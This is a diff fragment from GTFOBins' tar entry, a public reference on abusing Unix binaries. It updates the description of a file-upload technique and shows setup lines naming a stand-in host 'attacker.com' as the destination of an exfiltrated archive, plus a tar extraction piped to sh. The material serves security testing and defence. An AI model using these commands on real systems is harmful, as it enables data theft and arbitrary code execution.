GTFOBins/GTFOBins.github.io/_gtfobins/tar.md

         tar xf "$TF.tar" --to-command sh
         rm "$TF"*
   file-upload:
-    - description: Create tar archive and send it via SSH to a remote location.
-The attacker box must have the rmt utility installed.
+    - description: This only works for GNU tar.
+Create tar archive and send it via SSH to a remote location.
+The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).
       code: |
         export RHOST=attacker.com
         export RUSER=root